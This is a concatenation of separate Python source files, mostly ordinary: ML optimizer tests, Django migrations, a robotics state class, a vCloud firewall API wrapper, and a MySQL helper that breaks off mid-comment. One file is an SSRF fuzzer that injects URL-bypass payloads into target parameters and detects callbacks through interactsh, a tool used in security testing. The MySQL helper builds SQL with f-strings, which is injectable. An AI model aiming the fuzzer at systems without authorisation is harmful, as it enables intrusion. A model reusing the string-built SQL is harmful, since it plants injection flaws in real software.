# coding=utf-8
from smartnet.optims import *
from smartnet.layers import *
import smartnet as sn
import unittest
class OptimTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def setUpClass(cls):
print("optim test begins.")
@classmethod
def tearDownClass(cls):
print("optim test finished.")
@staticmethod
def test_sgd():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = SGDOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("sgd:", linear.named_parameters())
@staticmethod
def test_momentum():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = MomentumOptim(linear.named_parameters(), lr=0.001)
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("momentum:", linear.named_parameters())
@staticmethod
def test_rmsprop():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = RMSPropOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("rmsprop:", linear.named_parameters())
@staticmethod
def test_adam():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = AdamOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("adam:", linear.named_parameters())
if __name__ == "__main__":
unittest.main()
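# --- illustrative sketch (not part of the original tests) ---
# The four tests above repeat the same training loop with different optimizers. A
# hedged sketch of how that loop could be factored into one helper, using only the
# smartnet API already exercised above; `_fit_linear` is a hypothetical name.
def _fit_linear(optim_cls, steps=1000, **optim_kwargs):
    x = sn.random((30, 3))
    y = sn.matmul(x, sn.ones((3, 1)))
    linear = LinearLayer(3, 1, has_bias=False)
    opt = optim_cls(linear.named_parameters(), **optim_kwargs)
    loss = MSELayer()
    for _ in range(steps):
        opt.zero_grad()
        l = loss(linear(x), y)
        l.backward()
        opt.step()
    return linear.named_parameters()
# e.g. _fit_linear(SGDOptim) or _fit_linear(MomentumOptim, lr=0.001)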
|
# Generated by Django 2.2.4 on 2019-08-03 08:31
from django.db import migrations, models
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0006_auto_20190803_0830'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='_image',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_image, verbose_name='image'),
),
migrations.AlterField(
model_name='customuser',
name='_image_thumb',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_thumb, verbose_name='image_thumb'),
),
]
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""A class for link state."""
from typing import Optional
from deepsim.core.pose import Pose
from deepsim.core.twist import Twist
from gazebo_msgs.msg import LinkState as ROSLinkState
class LinkState:
"""
LinkState class
"""
def __init__(self,
link_name: Optional[str] = None,
pose: Optional[Pose] = None,
twist: Optional[Twist] = None,
reference_frame: Optional[str] = None):
"""
Initialize LinkState class
Args:
link_name (Optional[str]): link name
pose (Optional[Pose]): desired pose in reference frame
twist (Optional[Twist]): desired twist in reference frame
reference_frame (Optional[str]): set pose/twist relative to the frame of this entity (Body/Model);
leave empty, or use "world" or "map", to default to the world frame
"""
self._link_name = link_name
self._pose = pose.copy() if pose else Pose()
self._twist = twist.copy() if twist else Twist()
self._reference_frame = reference_frame or ''
@property
def link_name(self) -> str:
"""
Returns the link name
Returns:
str: link name
"""
return self._link_name
@link_name.setter
def link_name(self, value: str) -> None:
"""
Set link name
Args:
value (str): link name
"""
self._link_name = value
@property
def pose(self) -> Pose:
"""
Returns the copy of pose.
Returns:
Pose: the copy of pose of the link
"""
return self._pose.copy()
@pose.setter
def pose(self, value: Pose) -> None:
"""
Set the pose.
Args:
value (Pose): the pose
"""
self._pose = value.copy()
@property
def twist(self) -> Twist:
"""
Return the copy of twist.
Returns:
Twist: the copy of twist
"""
return self._twist.copy()
@twist.setter
def twist(self, value: Twist) -> None:
"""
Set the twist.
Args:
value (Twist): the twist
"""
self._twist = value.copy()
@property
def reference_frame(self) -> str:
"""
Returns the reference frame
Returns:
str: the reference frame
"""
return self._reference_frame
@reference_frame.setter
def reference_frame(self, value: str) -> None:
"""
Set the reference frame
Args:
value (str): the reference frame
"""
self._reference_frame = value
def to_ros(self) -> ROSLinkState:
"""
Return the ROS LinkState object created from this link state.
Returns:
gazebo_msgs.msg.LinkState: ROS LinkState
"""
ros_link_state = ROSLinkState()
if self.link_name:
ros_link_state.link_name = self.link_name
if self._pose:
ros_link_state.pose = self._pose.to_ros()
if self._twist:
ros_link_state.twist = self._twist.to_ros()
if self.reference_frame:
ros_link_state.reference_frame = self.reference_frame
return ros_link_state
@staticmethod
def from_ros(value: ROSLinkState) -> 'LinkState':
"""
Returns new LinkState object created from ROS LinkState
Args:
value (ROSLinkState): ROS LinkState
Returns:
LinkState: new LinkState object created from ROS LinkState
"""
return LinkState(link_name=value.link_name,
pose=Pose.from_ros(value.pose),
twist=Twist.from_ros(value.twist),
reference_frame=value.reference_frame)
def copy(self) -> 'LinkState':
"""
Returns a copy.
Returns:
LinkState: the copied link state
"""
return LinkState(link_name=self.link_name,
pose=self._pose,
twist=self._twist,
reference_frame=self.reference_frame)
def __eq__(self, other: 'LinkState') -> bool:
"""
Equality of LinkState.
Args:
other (LinkState): other to compare
Returns:
bool: True if the differences of all components are within epsilon; otherwise False.
"""
return (self.link_name == other.link_name and self.reference_frame == other.reference_frame
and self._pose == other._pose and self._twist == other._twist)
def __ne__(self, other: 'LinkState') -> bool:
"""
Inequality of LinkState.
Args:
other (LinkState): other to compare
Returns:
bool: False if the differences of all components are within epsilon; otherwise True.
"""
return not self.__eq__(other)
def __str__(self) -> str:
"""
String representation of a link state
Returns:
str: String representation of a link state
"""
return "(link_name=%s, pose=%s, twist=%s, reference_frame=%s)" % (self.link_name,
repr(self._pose),
repr(self._twist),
self.reference_frame)
def __repr__(self) -> str:
"""
String representation including class
Returns:
str: String representation including class
"""
return "LinkState" + str(self)
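# --- illustrative sketch (not part of the original module) ---
# A hedged example of typical round-tripping with this class, using only the API
# defined above; the link name and frame are hypothetical values.
if __name__ == "__main__":
    state = LinkState(link_name="robot::chassis", reference_frame="world")
    ros_msg = state.to_ros()                # gazebo_msgs.msg.LinkState
    restored = LinkState.from_ros(ros_msg)  # back to a LinkState
    # restored should compare equal to state if Pose/Twist round-trip losslessly
    print(restored == state, repr(restored))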
|
import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args()
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
id = random.randint(0, 999999)
os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize): #Multithreading
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}", # whitelisted.attacker.com
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
hostExtractorRegex = r'(?<=(https|http):\/\/)(.*?)(?=\/)'
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
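# Illustrative sketch (hypothetical helper, never called by the tool): shows what
# prepare_url_with_regex returns for a URL whose "url=" parameter matches regexParams;
# the example URL is made up.
def _example_prepare_url_with_regex():
    url = "http://victim.example/page?url=http://internal/admin"
    replaced, matched = prepare_url_with_regex(url)
    # replaced -> "http://victim.example/page?url=??????"  (FUZZ_PLACE_HOLDER substituted)
    # matched  -> "http://internal/admin"
    return replaced, matched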
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem: #No relevant parameter matching
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type, url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e: #requests.exceptions.RequestException:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main()
|
# Generated by Django 3.1.14 on 2022-03-04 18:39
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0003_user_username'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='username',
),
]
|
# Generated by Django 3.0.11 on 2021-02-28 16:39
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bpp", "0240_auto_20210228_1739"),
("import_pracownikow", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="ImportPracownikowRow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("wiersz_xls", models.PositiveSmallIntegerField()),
(
"dane_z_xls",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True, null=True
),
),
(
"autor",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Autor"
),
),
(
"autor_jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="bpp.Autor_Jednostka",
),
),
(
"jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Jednostka"
),
),
(
"parent",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="import_pracownikow.ImportPracownikow",
),
),
],
),
]
|
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import pgettext_lazy
from django.utils.timezone import now
class ExpenseTypes(models.Model):
name = models.CharField(
pgettext_lazy('ExpenseTypes field', 'name'), unique=True, max_length=128)
description = models.TextField(
verbose_name=pgettext_lazy('ExpenseTypes field', 'description'), blank=True, null=True)
updated_at = models.DateTimeField(
pgettext_lazy('ExpenseTypes field', 'updated at'), auto_now=True, null=True)
created = models.DateTimeField(pgettext_lazy('ExpenseTypes field', 'created'),
default=now, editable=False)
class Meta:
app_label = 'expensetypes'
verbose_name = pgettext_lazy('ExpenseType model', 'ExpenseType')
verbose_name_plural = pgettext_lazy('ExpenseTypes model', 'ExpenseTypes')
def __str__(self):
return self.name
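# --- illustrative sketch (hedged, not part of the original module) ---
# Typical ORM usage for this model, assuming the 'expensetypes' app and its
# migrations are installed; the helper and its values are hypothetical.
def _example_usage():
    travel = ExpenseTypes.objects.create(name='Travel', description='Trips and mileage')
    assert str(travel) == 'Travel'  # __str__ returns the unique name
    return ExpenseTypes.objects.filter(name__iexact='travel').exists()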
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
averageX, averageY = [float(num) for num in input().split(" ")]
CostX = 160 + 40*(averageX + averageX**2)
CostY = 128 + 40*(averageY + averageY**2)
print(round(CostX, 3))
print(round(CostY, 3))
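# --- illustrative note (hedged, not part of the original submission) ---
# This appears to rely on the Poisson identity E[X^2] = Var(X) + E[X]^2 = lam + lam**2,
# so a cost of the form a + b*X**2 has expected value a + b*(lam + lam**2). The helper
# below restates that formula; the example numbers are hypothetical.
def expected_cost(fixed, per_unit, lam):
    return fixed + per_unit * (lam + lam ** 2)
# e.g. expected_cost(160, 40, 0.88) ~= 226.176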
|
# -*- coding: utf-8 -*-
import hnswlib
import numpy as np
def buildIndex(X):
dim = X.shape[1]
num_elements = X.shape[0]
data_labels = np.arange(num_elements)
p = hnswlib.Index(space = 'cosine', dim = dim)
p.init_index(max_elements = num_elements, ef_construction = 200, M = 16)
p.add_items(X, data_labels)
p.set_ef(5)
return p
def searchIndex(p, X, k=5):
labels, distances = p.knn_query(X, k = k)
return labels
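# --- illustrative usage sketch (hedged, not part of the original module) ---
# Builds an index over random vectors and queries it; the shapes are hypothetical.
# hnswlib requires ef >= k at query time, so the ef of 5 set in buildIndex is the
# minimum that still supports the default k=5.
if __name__ == "__main__":
    X = np.float32(np.random.random((1000, 64)))
    index = buildIndex(X)
    neighbors = searchIndex(index, X[:3], k=5)  # labels of the 5 nearest items per query row
    print(neighbors.shape)                      # (3, 5)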
|
# VMware vCloud Director Python SDK
# Copyright (c) 2014-2019 VMware, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyvcloud.vcd.client import create_element
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.gateway import Gateway
from pyvcloud.vcd.gateway_services import GatewayServices
from pyvcloud.vcd.network_url_constants import FIREWALL_RULE_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_RULES_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_URL_TEMPLATE
class FirewallRule(GatewayServices):
__SOURCE = 'source'
__DESTINATION = 'destination'
__GROUP_OBJECT_LIST = [
'securitygroup', 'ipset', 'virtualmachine', 'network'
]
__VNIC_GROUP_LIST = ['gatewayinterface']
__APPLICATION = 'application'
__SERVICE = 'service'
__PROTOCOL_LIST = ['tcp', 'udp', 'icmp', 'any']
def _build_self_href(self, rule_id):
rule_href = (
self.network_url + FIREWALL_RULE_URL_TEMPLATE).format(rule_id)
self.href = rule_href
def _extract_id(self, rule_href):
rule_id_index = rule_href.index(FIREWALL_RULES_URL_TEMPLATE) + \
len(FIREWALL_RULES_URL_TEMPLATE) + 1
return rule_href[rule_id_index:]
def __config_url(self):
config_index = self.href.index(FIREWALL_URL_TEMPLATE)
return self.href[:config_index] + FIREWALL_URL_TEMPLATE
def _reload(self):
"""Reloads the resource representation of the Firewall rule."""
self.resource = \
self.client.get_resource(self.href)
def delete(self):
"""Delete a Firewall rule from gateway."""
self._get_resource()
return self.client.delete_resource(self.href)
def edit(self,
source_values=None,
destination_values=None,
services=None,
new_name=None):
"""Edit a Firewall rule.
:param list source_values: list of source values. e.g.,
[value:value_type]
:param list destination_values: list of destination values. e.g.,
[value:value_type]
:param list services: protocol to port mapping.
e.g., [{'tcp': {'any': 'any'}}]
:param str new_name: new name of the firewall rule.
"""
self._get_resource()
self.validate_types(source_values, FirewallRule.__SOURCE)
self.validate_types(destination_values, FirewallRule.__DESTINATION)
firewall_rule_temp = self.resource
if source_values:
if not hasattr(firewall_rule_temp, FirewallRule.__SOURCE):
firewall_rule_temp.append(
create_element(FirewallRule.__SOURCE))
if not hasattr(firewall_rule_temp.source, 'exclude'):
firewall_rule_temp.source.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, source_values,
FirewallRule.__SOURCE)
if destination_values:
if not hasattr(firewall_rule_temp, FirewallRule.__DESTINATION):
firewall_rule_temp.append(
create_element(FirewallRule.__DESTINATION))
if not hasattr(firewall_rule_temp.destination, 'exclude'):
firewall_rule_temp.destination.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, destination_values,
FirewallRule.__DESTINATION)
if services:
if not hasattr(firewall_rule_temp, FirewallRule.__APPLICATION):
firewall_rule_temp.append(
create_element(FirewallRule.__APPLICATION))
self._populate_services(firewall_rule_temp, services)
if new_name:
firewall_rule_temp.name = new_name
self.client.put_resource(self.href, firewall_rule_temp,
EntityType.DEFAULT_CONTENT_TYPE.value)
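# Illustrative sketch (hedged): how edit() might be called, using the value formats
# described in its docstring. `rule` is assumed to be a FirewallRule instance obtained
# elsewhere (e.g. via the gateway APIs); names such as 'ExtNw' are hypothetical.
#
#   rule.edit(source_values=['ExtNw:gatewayinterface', '10.0.0.5:ip'],
#             destination_values=['routed-net:network'],
#             services=[{'tcp': {'any': 'any'}}],
#             new_name='allow-tcp-from-extnw')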
def _populate_services(self, firewall_rule_temp, services):
"""Populates service elements.
:param firewall_rule_temp: Firewall rule
:param [] services: protocol to port mapping.
e.g., [{'tcp': {'any': 'any'}}]
"""
if services:
for service in services:
protocol = [k for k in service.keys()][0]
if protocol not in FirewallRule.__PROTOCOL_LIST:
valid_protocols = ', '.join(FirewallRule.__PROTOCOL_LIST)
raise InvalidParameterException(
protocol + " is not valid. It should be from " +
valid_protocols)
value = service.get(protocol)
source_port = [port for port in value.keys()][0]
destination_port = value.get(source_port)
self.__populate_protocol_elements(firewall_rule_temp, protocol,
source_port,
destination_port)
def __populate_protocol_elements(self, firewall_rule_temp, protocol,
source_port, destination_port):
"""Populate protocol elements. It mutates the firewall rule object.
:param firewall_rule_temp: Firewall rule obj
:param protocol: protocol
:param source_port: source port
:param destination_port: destination port
"""
application_tag = firewall_rule_temp.application
service_tag = create_element('service')
service_tag.append(create_element('protocol', protocol))
service_tag.append(create_element('port', destination_port))
service_tag.append(create_element('sourcePort', source_port))
if protocol == 'icmp':
service_tag.append(create_element('icmpType', 'any'))
application_tag.append(service_tag)
def _populate_objects_info(self, firewall_rule_temp, values, type):
"""It will mutate firewall_rule_temp.
:param firewall_rule_temp: Firewall rule object resource
:param list values: list of values
:param str type: type. e.g., source, destination
"""
for value in values:
values_arr = value.split(':')
object_type = values_arr[1]
object = values_arr[0]
if type == FirewallRule.__SOURCE:
firewall_rule_temp.source.append(
self._get_group_element(type, object_type, object))
if type == FirewallRule.__DESTINATION:
firewall_rule_temp.destination.append(
self._get_group_element(type, object_type, object))
def _get_group_element(self, type, object_type, value):
"""Get group element base upon the type and object type.
:param str type: It can be source/destination
:param str object_type: Possible values for this would be
'gatewayinterface','virtualmachine','network', 'ipset',
'securitygroup', 'ip'
:param str value: value
:return: group objectified element
:rtype: lxml.objectify.ObjectifiedElement
"""
if object_type == 'ip':
return create_element('ipAddress', value)
if object_type in FirewallRule.__GROUP_OBJECT_LIST:
return self.__find_element(type, object_type, value,
'groupingObjectId')
elif object_type in FirewallRule.__VNIC_GROUP_LIST:
return self.__find_element(type, object_type, value, 'vnicGroupId')
def __find_element(self, type, object_type, value, group_type):
"""Find element in the properties using group type.
:param str type: It can be source/destination
:param dict object_type: object types
:param str value: value
:param str group_type: group type. e.g., groupingObjectId
"""
gateway_res = Gateway(self.client, resource=self.parent)
object_list = gateway_res.list_firewall_objects(type, object_type)
for object in object_list:
if object.get('name') == value:
properties = object.get('prop')
for prop in properties:
if prop.get('name') == group_type:
return create_element(group_type, prop.get('value'))
def validate_types(self, source_types, type):
"""Validate input param for valid type.
:param list source_types: list of value:value_type. e.g.,
ExtNw:gatewayinterface
:param str type: It can be source/destination
:raise: InvalidParameterException: exception if input param is not
valid.
"""
if source_types:
valid_type_list = [
'gatewayinterface', 'virtualmachine', 'network', 'ipset',
'securitygroup', 'ip'
]
for source_type in source_types:
if source_type.lower() == 'any':
continue
source_type_arr = source_type.split(':')
if len(source_type_arr) <= 1:
raise InvalidParameterException(
type + " type should be in the format of "
"value:value_type. for ex: "
"ExtNw:gatewayinterface")
valid_type = source_type_arr[1]
if valid_type not in valid_type_list:
valid_type_list_str = ','.join(valid_type_list)
raise InvalidParameterException(
valid_type + " param is not valid. It should be "
"from " + valid_type_list_str)
def enable_disable_firewall_rule(self, is_enabled):
"""Enable or disable the firewall rule on the gateway.
:param bool is_enabled: flag to enable/disable the firewall rule.
"""
current_firewall_status = self._get_resource().enabled
if is_enabled == current_firewall_status:
return
if is_enabled:
self._get_resource().enabled = True
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
else:
self._get_resource().enabled = False
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
def info_firewall_rule(self):
"""Get the details of firewall rule.
:return: Dictionary having firewall rule details.
e.g.
{'Id': 196609, 'Name': 'Test rule', 'Rule type':'user',
'Enabled':'True','Logging enabled':'True','Action':'Accept'}
:rtype: Dictionary
"""
firewall_rule_info = {}
resource = self._get_resource()
firewall_rule_info['Id'] = resource.id
firewall_rule_info['Name'] = resource.name
firewall_rule_info['Rule type'] = resource.ruleType
firewall_rule_info['Enabled'] = resource.enabled
firewall_rule_info['Logging enabled'] = resource.loggingEnabled
firewall_rule_info['Action'] = resource.action
return firewall_rule_info
def list_firewall_rule_source_destination(self, type):
"""Get the list of firewall rule source/destination.
:param str type: It can be source/destination
:return: dict of firewall rule's source/destination details.
e.g.
{'exclude':'True','ipAddress':['10.112.12.12','10.232.1.2'],
'vnicGroupId':['vse','external','internal','vnic-0'],
'groupingObjectId':['1f0aab71-6d11-4567-994e-2c090fea7350:ipset',
'urn:vcloud:network:3ed60402-904f-410d-913c-6da77b43a257:']
}
:rtype: dict
"""
resource = self._get_resource()
firewall_rule_source_destination = {}
if hasattr(resource, type):
if hasattr(resource[type], 'exclude'):
firewall_rule_source_destination['exclude'] = resource[
type].exclude
if hasattr(resource[type], 'vnicGroupId'):
firewall_rule_source_destination['vnicGroupId'] = [
vnicGroupId for vnicGroupId in resource[type].vnicGroupId
]
if hasattr(resource[type], 'ipAddress'):
firewall_rule_source_destination['ipAddress'] = [
ipAddress for ipAddress in resource[type].ipAddress
]
if hasattr(resource[type], 'groupingObjectId'):
firewall_rule_source_destination['groupingObjectId'] = [
groupingObjectId
for groupingObjectId in resource[type].groupingObjectId
]
return firewall_rule_source_destination
def _build_firewall_rules_href(self):
return self.network_url + FIREWALL_URL_TEMPLATE
def update_firewall_rule_sequence(self, index):
"""Change firewall rule's sequence of gateway.
:param int index: new sequence index of firewall rule.
"""
index = int(index)
gateway_res = Gateway(self.client, resource=self.parent)
firewall_rule = gateway_res.get_firewall_rules()
resource = self._get_resource()
for rule in firewall_rule.firewallRules.firewallRule:
if rule.id == resource.id:
firewall_rule.firewallRules.remove(rule)
firewall_rule.firewallRules.insert(index, rule)
break
return self.client.put_resource(self._build_firewall_rules_href(),
firewall_rule,
EntityType.DEFAULT_CONTENT_TYPE.value)
def delete_firewall_rule_source_destination(self, value, type):
"""Delete firewall rule's source/destination value of gateway.
It will delete all source/destination value of given value.
:param str value: value to remove from source/destination.
:param str type: It can be source/destination
"""
resource = self._get_resource()
if hasattr(resource, type):
for object in resource[type].iter():
if object == value:
resource[type].remove(object)
return self.client.put_resource(self.href, resource,
EntityType.DEFAULT_CONTENT_TYPE.value)
|
import MySQLdb
from biliClass.biliAid import Aid
import time
def dblink():  # connect to the database
# demo
return MySQLdb.connect(
host='localhost',
user='root',
passwd='password',
db='nav',
charset='utf8'
)
def dbsql(conn, sql):  # execute a SQL statement
cursor = conn.cursor()
cursor.execute(sql)
return cursor
def dbclose(cursor, conn):  # close the cursor and the connection
cursor.close()
conn.commit()  # it seems this line might not be needed?
conn.close()
def insert(title, av_list):  # insert av records in a single batch
conn = dblink()
sql = """INSERT IGNORE INTO `nav_bili_v`
(`id`, `av`, `bv`, `class`, `title`, `pic`, `descript`, `dynamic`, `o_name`, `o_face`, `s_view`, `s_danmaku`, `s_reply`, `s_like`, `s_coin`, `s_favorite`, `s_share`, `s_time`, `up`)
VALUES """
try:
for av in av_list:
sql += f"""(NULL, '{av}', NULL, '{title}', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),"""
sql = sql[:-1]+';'  # Python strings are immutable, so rebind sql with the trailing comma replaced by ';'
cursor = dbsql(conn, sql)
dbclose(cursor, conn)
print('[log: insert succeeded]')
except:
print('[log: insert failed]')
def read(where=''):  # read from the database
if(where!=''):
where = 'WHERE ' + where
conn = dblink()
sql = f"""SELECT * FROM `nav_bili_v` {where}"""
cursor = dbsql(conn, sql)
s = ''
for row in cursor.fetchall():
s = s + str(row) + '\n'
dbclose(cursor, conn)
return s
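# Illustrative sketch (hedged, hypothetical helper not called anywhere): the queries
# above interpolate values straight into SQL strings. MySQLdb also supports
# parameterized queries via cursor.execute(sql, params), which avoids quoting and
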